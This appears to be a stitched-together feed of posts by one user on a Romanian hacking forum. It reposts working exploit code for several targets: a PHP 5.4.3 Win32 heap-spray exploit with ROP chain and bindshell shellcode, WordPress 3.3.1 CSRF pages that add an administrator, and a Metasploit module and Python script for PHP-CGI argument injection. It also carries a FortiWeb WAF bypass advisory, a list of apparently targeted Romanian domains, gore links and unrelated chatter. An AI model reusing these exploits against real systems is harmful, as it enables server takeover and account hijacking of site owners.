Nytro

[h=1]PHP 5.4 (5.4.3) Code Execution (Win32)[/h] // Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32) // Exploit author: 0in (Maksymilian Motyl) // Email: 0in(dot)email(at)gmail.com // * Bug with Variant type parsing originally discovered by Condis // Tested on Windows XP SP3 fully patched (Polish) =================== offset-brute.html =================== <html><body> <title>0day</title> <center> <font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br> <textarea rows=50 cols=50 id="log"></textarea> </center> <script> function sleep(milliseconds) { var start = new Date().getTime(); for (var i = 0; i < 1e7; i++) { if ((new Date().getTime() - start) > milliseconds){ break; } } } function makeRequest(url, parameters) { var xmlhttp = new XMLHttpRequest(); if (window.XMLHttpRequest) { xmlhttp = new XMLHttpRequest(); if (xmlhttp.overrideMimeType) { xmlhttp.overrideMimeType('text/xml'); } } else if (window.ActiveXObject) { // IE try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } } if (!xmlhttp) { alert('Giving up Cannot create an XMLHTTP instance'); return false; } xmlhttp.open("GET",url,true); xmlhttp.send(null); return true; } test=document.getElementById("log"); for(offset=0;offset<300;offset++) { log.value+="Trying offset:"+offset+"\r\n"; makeRequest("0day.php?offset="+offset); sleep(500); } </script></body></html> =================== 0day.php =================== <?php $spray = str_repeat("\x90",0x200); $offset=$_GET['offset']; // 775DF0Da # ADD ESP,10 # RETN ** [ole32.dll] $spray = substr_replace($spray, "\xda\xf0\x5d\x77", (strlen($spray))*-1,(strlen($spray))*-1); // :> 0x048d0030 $spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1); //0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN [ole32.dll] $spray = substr_replace($spray, "\x9f\xae\x52\x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1); // Adress of VirtualProtect 0x7c801ad4 $spray = substr_replace($spray, "\xd4\x1a\x80\x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1); // LPVOID lpAddress = 0x048d0060 $spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1); // SIZE_T dwSize = 0x01000000 $spray = substr_replace($spray, "\x00\x00\x10\x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1); // DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0 $spray = substr_replace($spray, "\x40\x00\x00\x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1); // __out PDWORD lpflOldProtect = 0x04300070 | 0x105240000 // 0x048d0068 $spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1); //0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C ** [ADVAPI32.dll] $spray = substr_replace($spray, "\xb4\xe8\xdf\x77", (strlen($spray)-0x18)*-1,4); // Ret Address = 0x048d0080 $spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4); $stacktrack = "\xbc\x0c\xb0\xc0\x00"; // Universal win32 bindshell on port 1337 from metasploit $shellcode = $stacktrack."\x33\xc9\x83\xe9\xb0". "\x81\xc4\xd0\xfd\xff\xff". "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d". "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96". "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2". "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0". "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41". "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82". "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2". "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39". "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9". "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b". "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a". "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88". "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01". "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20". "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e". "\xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39". "\x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44". "\xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96". "\x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38". "\xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9". "\x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09". "\x4e\x33\xe4\x96\xcd\xcc\x32\x69"; $spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode))); $fullspray=""; for($i=0;$i<0x4b00;$i++) { $fullspray.=$spray; } $j=array(); $e=array(); $b=array(); $a=array(); $c=array(); array_push($j,$fullspray); array_push($e,$fullspray."W"); array_push($b,$fullspray."A"); array_push($a,$fullspray."S"); array_push($c,$fullspray."!"); $vVar = new VARIANT(0x048d0038+$offset); // Shoot him com_print_typeinfo($vVar); //CRASH -> 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10] echo $arr; echo $spray; ?> Sursa: PHP 5.4 (5.4.3) Code Execution (Win32)

Ok, cand ajung acasa diseara, spuneti pe mess sa nu uit.

Nu e pentru tine probabil.

Aaaaanntoneescuu de traiaaa...

Utilizatorului unu_1234567 i-a fost scos rangul de V.I.P. pentru ca a profitat de acest aspect pentru a castiga incredere. Nu va primi ban, in niciun caz, datorita contributiile sale, cei cu vechime vor intelege. Speram sa nu se repete. Ramane la latitudinea voastra sa decideti "castigatorul" moral al disputei si daca va veti implica in trade-uri cu ei, tineti insa cont ca amandoi sunt persoane care merita respect, desi multi probabil nu stiti nimic despre ei.

Nu sunt fake tinere, in Africa inca se ard femei pe rug pentru vrajitorie, realitatea e dura. In Tibet calugaritele isi dau foc singure: Self Immolation Video of Buddhist Nun Palden Choetso in Tibet | Best Gore Self Immolation of a Nun in Tibet | Best Gore Apoi, in mijlocu "civilizatiei": http://www.bestgore.com/execution/african-man-lynched-burned-alive-gay-necklacing-failed/

Pff, nu imi place cum e facuta libraria, exemplul http://rolling-curl.googlecode.com/svn/trunk/example_groups.php nu cred ca te ajuta. Foloseste curl simplu, cu curl_multi_exec.

Photoshop CS5 (12.04 parca) crapa, dar nu se executa shellcode-ul. Are cineva CS5.1 sa incerce?

[TABLE=width: 720] [TR] [TD]1.[/TD] [TD]casadinpitesti.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]2.[/TD] [TD]smartprices.info[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]3.[/TD] [TD]www.activineuropa.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]4.[/TD] [TD]www.originalhandmade.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]5.[/TD] [TD]activineuropa.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]6.[/TD] [TD]www.ice-tropez.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]7.[/TD] [TD]www.novelresearch.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]8.[/TD] [TD]www.perlamamaia.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]9.[/TD] [TD]daune-auto.com[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]10.[/TD] [TD]www.daune-auto.com[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]11.[/TD] [TD]www.enovate.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]12.[/TD] [TD]www.casa-agave.ro[/TD] [TD]Whois [+][/TD] [/TR] [TR] [/TR] [TR] [TD]13.[/TD] [TD]www.uniromexim.ro[/TD] [TD]Whois [+][/TD] [/TR] [/TABLE] Prietenii stiu de ce.

Sunt baieti buni amandoi (din alte puncte de vedere), vom vedea diseara ce e de facut.

PHP-CGI Exploitation by Example - SpiderLabs Anterior

[h=1]Descarca BitDefender Total Security 2013 Beta – Testarea a inceput[/h] By Radu FaraVirusi(com) on May 7, 2012 BitDefender anunta lansarea produsului BitDefender Total Security 2013 Beta, care poate fi evaluat gratuit timp de 60 de zile. Ce noutati aduce? Device Anti-Theft USB Immunizer Windows Widget imbunatatiri aduse Parental Control, BitDefender SafeBox, MyBitDefender Dashboard Pentru a descarca BitDefender Total Security 2013 Beta accesati: Bitdefender Total Security 2013 BETA Sursa: Descarca BitDefender Total Security 2013 Beta – Testarea a inceput

[h=1]Fortinet FortiWeb Web Application Firewall Policy Bypass[/h] BINAR10 Report on Fortinet Fortiweb Findings 02/05/2012 - Fortinet FortiWeb Web Application Firewall Policy Bypass - ============================================================ 1) Affected Product Fabricant: Fortinet Product name: FortiWeb Version: Latest update to Tue, 2 May 2012 Type: Web Application Firewall Product URL: http://www.fortinet.com/products/fortiweb/index.html 2) Description of the Findings BINAR10 has found a policy bypass occurrence when large size data is sent in POST (data) or GET request. 3) Technical Details 3.1. POST Request Example When is appended to a POST request any padding data that surpasses 2399 bytes, the WAF do not inspect the data sent and the request hits directly the application. This should occur when the product is not configured to block malformed requests, but this feature also check the POST size limit, blocking the request if it surpass a fixed limit, therefore is likely that is being disabled due to application requirements in medium size forms. The response is also not verified by the WAF and information disclosure occurs with details of the infrastructure. This bypass could be used to inject different types of vectors, as is shown in the example only is needed to append a new variable at the end of the POST data filled with arbitrary data that exceeds 2399 bytes. ---POST example POST /<path>/login-app.aspx HTTP/1.1 Host: <host> User-Agent: <any valid user agent string> Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: <the content length must be at least 2399 bytes> var1=datavar1&var2=datavar12&pad=<random data to complete at least 2399 bytes> 3.2. GET Requests The same issue with POST Request but it could be done through the sending arbitrary data at the end of the URL. --GET example http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data> 4. Validation Required It requires the validation of other researchers who have access to product. 5. Time Table 04/27/2012 - Vendor notified. 04/27/2012 - Vendor response, requiring some tests. 05/02/2012 - Vendor indicates that this is a configuration problem and not a product vulnerability. 6. Credits Geffrey Velasquez <geffrey at gmail.com> at BINAR10 S.A.C. Sursa: Fortinet FortiWeb Web Application Firewall Policy Bypass

The curious case of Benjamin Button Sherlok Holmes Ring of the nibelungs The illusionist The librarian Butterfly effect Dark floors Room 1408 The cube The eye Triangle Nu neaparat psihologice, dar care merita vazute.

Eu l-am mutat acolo (de la Anunturi + warn), nu stiam unde altundeva. Calm.

Pe aici v-ati uitat: oberhumer.com: LZO real-time data compression library ?

[h=1]Wordpress 3.3.1 Multiple CSRF Vulnerabilities[/h] +---------------------------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : Wordpress 3.3.1 Multiple CSRF Vulnerabilities # Date : 19-03-2012 # Author : Ivano Binetti (http://www.ivanobinetti.com) # Software link : http://wordpress.org/wordpress-3.3.1.zip # Vendor site : http://wordpress.org # Version : 3.3.1 (and lower). Probably also version 3.3.2 is affected. # Tested on : Debian Squeeze (6.0) # Original Advisory : http://www.webapp-security.com/2012/04/wordpress-3-3-1-multiple-csrf-vulnerabilities/ # CVE : CVE-2012-1936 # OSVDB ID : 81588 # Bugtraq ID : 53280 +---------------------------------------------------------------------------------------------------------------------------------------------------+ Summary 1)Introduction 2)Vulnerabilities Description 2.1 Multiple CSRF 3)Exploit 3.1 CSRF (Change Post Title) 3.2 CSRF (Add Admin) +---------------------------------------------------------------------------------------------------------------------------------------------------+ 1)Introduction WordPress "is web software you can use to create a beautiful website or blog. We like to say that WordPress is both free and priceless at the same time." 2)Vulnerability Description 2.1 Multiple CSRF Wordpress 3.3.1 suffers from multiple CSRF vulnerabilities which allow an attacker to change post title, add administrators/users, delete administrators/users, approve and unapprove comment, delete comment, change background image, insert custom header image, change site title, change administrator's email, change Wordpress Address, change Site Address, when an authenticated user/admin browses a special crafted web page. May be other parameters can be modified. This vulnerability is caused by a security flaw in anti-CSRF token (_wpnonce, _wpnonce_create-user, _ajax_nonce, _wpnonce-custom-background-upload, _wpnonce-custom-header-upload) generation. For some operations (see below) above specified anti-CSRF tokens are not associated with the current user session (as Owasp recommends) but are the are valid for all operations (for a specific administrator/user) within 12 hour. The above described vulnerability allows an attacker - who has sniffed anti-CSRF token - to have 12 hour to perform a CSRF attack. For Owasp recommendation about anti-CSRF token, you can read the following document: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet#General_Recommendation:_Synchronizer_Token_Pattern This problem affects the following operations: - Add Admin/User - Delete Admin/User - Approve comment - Unapprove comment - Delete comment - Change background image - Insert custom header image - Change site title - Change administrator's email - Change Wordpress Address - Change Site Address Other operations (like insert a new post) are not affected by this CSRF vulnerability. In this Advisory I will only demonstrate how to change post title and how to add a new administrator account. 3)Exploit 3.1 CSRF (Change Post Title) <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to change post title</H2> <form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/admin-ajax.php"> <input type="hidden" name="post_title" value="hackedtitle"/> <input type="hidden" name="post_name" value="hackedtitle"/> <input type="hidden" name="mm" value="03"/> <input type="hidden" name="jj" value="16"/> <input type="hidden" name="aa" value="2012"/> <input type="hidden" name="hh" value=""/> <input type="hidden" name="mn" value=""/> <input type="hidden" name="ss" value=""/> <input type="hidden" name="post_author" value="1"/> <input type="hidden" name="post_password" value=""/> <input type="hidden" name="post_category%5B%5D" value="0"/> <input type="hidden" name="post_category%5B%5D" value="1"/> <input type="hidden" name="tax_input%5Bpost_tag%5D" value=""/> <input type="hidden" name="comment_status" value="open"/> <input type="hidden" name="ping_status" value="open"/> <input type="hidden" name="_status" value="publish"/> <input type="hidden" name="post_format" value="0"/> <input type="hidden" name="_inline_edit" value="<sniffed_value>"/> <input type="hidden" name="post_view" value="list"/> <input type="hidden" name="screen" value="edit-post"/> <input type="hidden" name="action" value="inline-save"/> <input type="hidden" name="post_type" value="post"/> <input type="hidden" name="post_ID" value="1"/> <input type="hidden" name="edit_date" value="true"/> <input type="hidden" name="post_status" value="all"/> </form> </body> </html> Note: this exploit simulate changing of post title using "Quick Edit" function 3.2 CSRF (Add Admin) <html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to add Administrator</H2> <form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/user-new.php"> <input type="hidden" name="action" value="createuser"/> <input type="hidden" name="_wpnonce_create-user" value="<sniffed_value>"/> <input type="hidden" name="_wp_http_referer" value="%2Fwordpress%2Fwp-admin%2Fuser-new.php"/> <input type="hidden" name="user_login" value="admin2"/> <input type="hidden" name="email" value="admin2@admin.com"/> <input type="hidden" name="first_name" value="admin2@admin.com"/> <input type="hidden" name="last_name" value=""/> <input type="hidden" name="url" value=""/> <input type="hidden" name="pass1" value="password"/> <input type="hidden" name="pass2" value="password"/> <input type="hidden" name="role" value="administrator"/> <input type="hidden" name="createuser" value="Add+New+User+"/> </form> </body> </html> +--------------------------------------------------------------------------------------------------------------------------------------------------+ Sursa: Wordpress 3.3.1 Multiple CSRF Vulnerabilities

[h=1]PHP CGI Argument Injection[/h] ## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'PHP CGI Argument Injection', 'Description' => %q{ When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: "if there is NO unescaped '=' in the query string, the string is split on '+' (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the "encoded in a system-defined manner" from the RFC) and then passes them to the CGI binary." }, 'Author' => [ 'egypt', 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ "CVE" , "2012-1823" ], [ "URL" , "http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/" ], ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, # Arbitrary big number. The payload gets sent as an HTTP # response body, so really it's unlimited 'Space' => 262144, # 256k }, 'DisclosureDate' => 'May 03 2012', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0)) register_options([ OptString.new('TARGETURI', [false, "The URI to request (must be a CGI-handled PHP script)"]), ], self.class) end # php-cgi -h # ... # -s Display colour syntax highlighted source. def check uri = target_uri.path uri.gsub!(/\?.*/, "") print_status("Checking uri #{uri}") response = send_request_raw({ 'uri' => uri }) if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi print_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable") return Exploit::CheckCode::Unknown end response = send_request_raw({ 'uri' => uri + '?-s'}) if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi return Exploit::CheckCode::Vulnerable end print_error("Server responded indicating it was not vulnerable") return Exploit::CheckCode::Safe end def exploit begin args = [ "-d+allow_url_include%3d#{rand_php_ini_true}", "-d+safe_mode%3d#{rand_php_ini_false}", "-d+suhosin.simulation%3d#{rand_php_ini_true}", "-d+disable_functions%3d%22%22", "-d+open_basedir%3dnone", "-d+auto_prepend_file%3dphp://input", "-n" ] qs = args.join("+") uri = "#{target_uri}?#{qs}" # Has to be all on one line, so gsub out the comments and the newlines payload_oneline = "<?php " + payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "") response = send_request_cgi( { 'method' => "POST", 'global' => true, 'uri' => uri, 'data' => payload_oneline, }, 0.5) handler rescue ::Interrupt raise $! rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused print_error("The target service unreachable") rescue ::OpenSSL::SSL::SSLError print_error("The target failed to negotiate SSL, is this really an SSL service?") end end def rand_php_ini_false Rex::Text.to_rand_case([ "0", "off", "false" ][rand(3)]) end def rand_php_ini_true Rex::Text.to_rand_case([ "1", "on", "true" ][rand(3)]) end end [h=1]PHP CGI Argument Injection Exploit[/h] ###################################################################################### # Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit # Date: May 4, 2012 # Author: rayh4c[0x40]80sec[0x2e]com # Exploit Discovered by wofeiwo[0x40]80sec[0x2e]com ###################################################################################### import socket import sys def cgi_exploit(): pwn_code = """<?php phpinfo();?>""" post_Length = len(pwn_code) http_raw="""POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1 Host: %s Content-Type: application/x-www-form-urlencoded Content-Length: %s %s """ %(HOST , post_Length ,pwn_code) print http_raw try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((HOST, int(PORT))) sock.send(http_raw) data = sock.recv(10000) print repr(data) sock.close() except socket.error, msg: sys.stderr.write("[ERROR] %s\n" % msg[1]) sys.exit(1) if __name__ == '__main__': try: HOST = sys.argv[1] PORT = sys.argv[2] cgi_exploit() except IndexError: print '[+]Usage: cgi_test.py site.com 80' sys.exit(-1) Surse: - PHP CGI Argument Injection - PHP CGI Argument Injection Exploit

Bun, data si ora?

Esti in Bucuresti? Ne bagam la o bauta?

Smecheria cu salariile mari e ca de cele mai multe ori se semneaza contracte pe perioade mari de timp, probabil asa e si aici, daca semneaza pe 2-3 ani, deja in 6 luni stie de ajuns ca sa merite acel salariu (bine, 1 an sa zicem), apoi devine "profitabil" pentru firma.

[h=2]Android Ported to C#[/h] Oracle and Google are currently in a $1 billion wrestling match over Google’s use of Java in Android. But Java is not the only way to build native apps on Android. In fact, it’s not even the best way: we have been offering C# to Android developers as a high-performance, low-battery consuming alternative to Java. Our platform, Mono, is an open source implementation of the .NET framework that allows developers to write their code using C# while running on top of the Java-powered operating system, and then share that same code with iOS and Windows Phone. Unlike Sun with Java, Microsoft submitted C# and the .NET VM for standardization to ECMA and saw those standards graduated all the way to ISO strong patent commitments. The .NET framework is also covered by Microsoft’s legally binding community promise. Last July when Xamarin was getting started, we got our team together in Boston to plan the evolution of Mono on iOS and Android. After a day of kayaking in the Charles River, we sat down to dinner and turned our attention to how we could improve the performance and battery life of applications on Android, and make our own Mono for Android even better. The Xamarin team after a day of Kayaking, back when we were a small company Over and over we came back to the basics: Dalvik is a young virtual machine, it is not as performant or tuned as Mono and suffers from many of Java’s performance limitations without the benefit of the high-end optimizations from Oracle’s HotSpot. One crazy idea that the team had at that dinner was to translate Android’s source code to C#. Android would benefit from C# performance features like structures, P/Invoke, real generics and our more mature runtime. Although nothing happened back in July, this idea stuck in the back of our minds. Fast forward a few months: Mono for Android is doing great, and we are starting to think again about improving our own product’s performance on Android. What if we could swap out Java with faster C# and get rid of various Dalvik limitations in the process? Could we create an Android phone completely free of Java, and free of the limitations of the Dalvik VM? We decided it was crazy enough to try. So we started a small skunkworks project with the goal of doing a machine translation of Android from Java to C#. We called this project XobotOS. [h=2]The XobotOS Research Project[/h]The result of our efforts is that today we have most of Android’s layouts and controls entirely in C#. Here are some screenshots of XobotOS running on a Linux workstation, no Java involved: Getting to this point required that the majority of the Android Java code be translated from Java to C#, so what you see above represents very significant progress. So how did we do it? [h=2]Java Translation via Sharpen[/h]Android’s core codebase contains over a million lines of Java code, and we knew we wanted to be able to stay up to date with new releases of Android — in fact, we started with the Android 2.x source code back in 2011, and then upgraded XobotOS to Android 4.0 when Google open sourced Ice Cream Sandwich earlier this year. So for us, the only reasonable option was to do a machine translation of Java to C#, building and maintaining any necessary tools along the way. The tool we used as a starting point is called Sharpen. Sharpen is famous for helping people such as Frank Krueger port a Java applet to an award-winning iPad app in two months. We matured Sharpen a lot, and the result is a much-improved Java-to-C# translation tool for everyone. We are releasing this new version of Sharpen today along with the code for XobotOS and we hope that many more people will benefit from it and contribute to it. [h=2]Performance[/h]So once you have Android running on Mono, the obvious question is — how does Mono perform compared to Dalvik? So once you have Android running on Mono, the obvious question is — how does Mono perform compared to Dalvik? When C# came around, Microsoft modified the language in a couple of significant ways that made it easier to optimize. Value types were introduced to allow small objects to have low overheads and virtual methods were made opt-in, instead of opt-out which made for simpler VMs. Later on, Java and C# diverged in the way that they implemented generics. Java went with a full-backwards compatibility approach, while C# baked the support into the runtime. The C# approach led to a simple-to-use, simple-to-understand generics setup as well as being much more performant and complete. Since then, both the language and the execution environment have continued to evolve and improve. C# went from being a slightly better Java to be light-years ahead. From embracing dynamic programming, bring asynchronicity into the language, introduce iterators, functional programming constructs, embrace parallelism and got a great implementation of generics. Many of the these features came from the research done by Don Syme and his F# team that have kept a steady flow of new ideas getting injected into the language. Furthermore, Mono as a virtual machine has matured substantially in the last 10 years and is now considered to be on its 8th generation. All of this adds up. You can see the massive difference in the performance of structs and generics in this benchmark we ran of a simple binary tree implementation in Java and C#: [h=2]What’s Next[/h]Today we’re proud to announce that we’ve made XobotOS available on github so that you can try it out yourself. Our goal as a company is to provide the best platform for building mobile apps, and so XobotOS will not be a focus for us going forward. But it was a fun experiment to run, and as it turns out, a few technologies have come out of the effort that we’ll be able to include in future versions of our products: Direct Graphics Access to Skia: Currently Mono for Android accesses the underlying graphics libraries through Java, with the code that we built for XobotOS, we will skip the middleman and use Mono’s P/Invoke to get straight to the native rendering code in Skia. Java to C# tooling: Our new version of Sharpen is available as part of our XobotOS release. Replacing Java code with C# code we now have the tools necessary to replace some chunks of Java code with C# code where performance is critical and when C# can offer better solutions than Java has. Our plan is to take elements of the research project and integrate those into our products. A project that we started because we thought it would be fun to do has turned out to yield some serious benefits for our products. It’s important for a startup to stay focused, but sometimes you have to try something crazy to make progress. And who knows, maybe Google will thank us some day . Xamarin is hiring for many positions to advance the state of the art in mobile development. Sursa: Android Ported to C# – Xamarin

Legat de Microsoft Windows, pentru cei care sunt sceptici la securitatea sistemelor Windows... Windows Firewall: Group policy editor: File permissions: Si multe altele. Windows nu e tocmai "inapt" la capitolul securitate, de fapt, dupa parerea mea sta cel mai bine la acest capitol, iar Linux si alte sisteme de operare mai au mult pana sa ajunga la nivelul sau, problema e simpla "utilizatorii". Cati or sta sa isi configureze reguli in firewall sau sa puna restrictii pe foldere? Nimeni. De aceea eu ma astept sa nu se planga nimeni. Windows are cu ce, dar nu are cu cine. Deci Microsoft are tot dreptul sa ii ia peste picior pe Apple.